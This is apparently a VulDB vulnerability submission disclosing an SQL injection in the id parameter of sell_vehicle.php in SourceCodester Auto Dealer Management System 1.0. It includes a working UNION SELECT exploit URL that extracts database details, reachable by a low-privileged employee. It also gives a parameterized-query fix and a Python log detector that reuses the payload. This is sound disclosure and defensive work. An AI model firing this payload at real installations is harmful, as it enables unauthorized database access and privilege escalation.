Submit #91351: SOURCECODESTER Auto Dealer Management System 1.0 / sell_vehicle.php id SQL Injection

Title: SOURCECODESTER Auto Dealer Management System 1.0 / sell_vehicle.php id SQL Injection
Description: The Auto Dealer Management System's sell_vehicle.php parameter id is vulnerable to SQL injection.

Vendor Homepage: https://www.sourcecodester.com
Software Link: https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html
Version: v 1.0

Affected Page:
- sell_vehicle.php
- On this page the id parameter is vulnerable to SQL injection.
- URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=*

Description: The auto dealer management system supports two user roles, admin and normal employee. The roles are as follows:
- Admin user has full access to the system.
- Employee user has access to only a few menus, i.e. dashboard, car models and vehicles (available and transaction).
- An employee could perform the SQL injection by opening the sell vehicle transaction from his/her profile. Therefore, a low-privileged user could gain access to the full system.

Proof of Concept: The following steps are involved:
- An employee opens the sell vehicle transaction form and could perform the SQL injection through the vulnerable parameter (?page=vehicles/sell_vehicle&id=1*).
- Full exploit URL is: localhost/adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+-

Recommendation: Whoever uses this CMS should update the application code to use parameterized queries to avoid SQL injection attacks. Example code:
// Bind the id as a parameter instead of concatenating it into the SQL string.
$sql = $obj_admin->db->prepare("SELECT * FROM `transaction_list` WHERE id = :id");
$sql->bindParam(':id', $id);
$sql->execute();
$row = $sql->fetch(PDO::FETCH_ASSOC);
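As an added detection example (not part of this submission or the vendor's code), the following Python flags web-server requests to the sell_vehicle page whose id parameter is anything other than a plain integer, which is the shape of the vector described above. The access-log lines are constructed for the example, with the PoC URL from this submission as the positive case.

```python
"""Flag sell_vehicle requests whose `id` is not a plain integer.

The vulnerable parameter is an integer record id, so any id value that is
not purely digits is worth alerting on. Log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2023:20:10:01 +0000] "GET /adms/admin/?page=vehicles/sell_vehicle&id=7 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Feb/2023:20:11:42 +0000] "GET /adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- HTTP/1.1" 200 6011
10.0.0.9 - - [18/Feb/2023:20:12:03 +0000] "GET /adms/admin/?page=vehicles/manage_vehicle&id=3 HTTP/1.1" 200 4000
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PAGE = "vehicles/sell_vehicle"


def suspicious_id(target: str):
    """Return the decoded id if `target` hits sell_vehicle with a non-integer id, else None."""
    # parse_qs already percent-decodes and turns '+' into spaces.
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("page", [""])[0] != VULN_PAGE:
        return None
    for value in qs.get("id", []):
        if not re.fullmatch(r"\d+", value):
            return value
    return None


def scan_log(text: str):
    """Return a list of (client_ip, decoded_id) for each suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        bad = suspicious_id(match.group("target"))
        if bad is not None:
            hits.append((client_ip, bad))
    return hits


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip} sent non-integer id to {VULN_PAGE}: {value!r}")
```

The same integer check applied server-side (rejecting or casting non-numeric ids before they reach the query) complements the parameterized query recommended above.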
Source: https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Auto%20Dealer%20Management%20System%20-%20SQL%20Injection%20-%202.md
User: navaidansari (UID 41266)
Submission: 02/18/2023 20:16
Moderation: 02/18/2023 20:34 (18 minutes later)
Status: Accepted
VulDB entry: 221482 [SourceCodester Auto Dealer Management System 1.0 sell_vehicle ID sql injection]
Points: 20
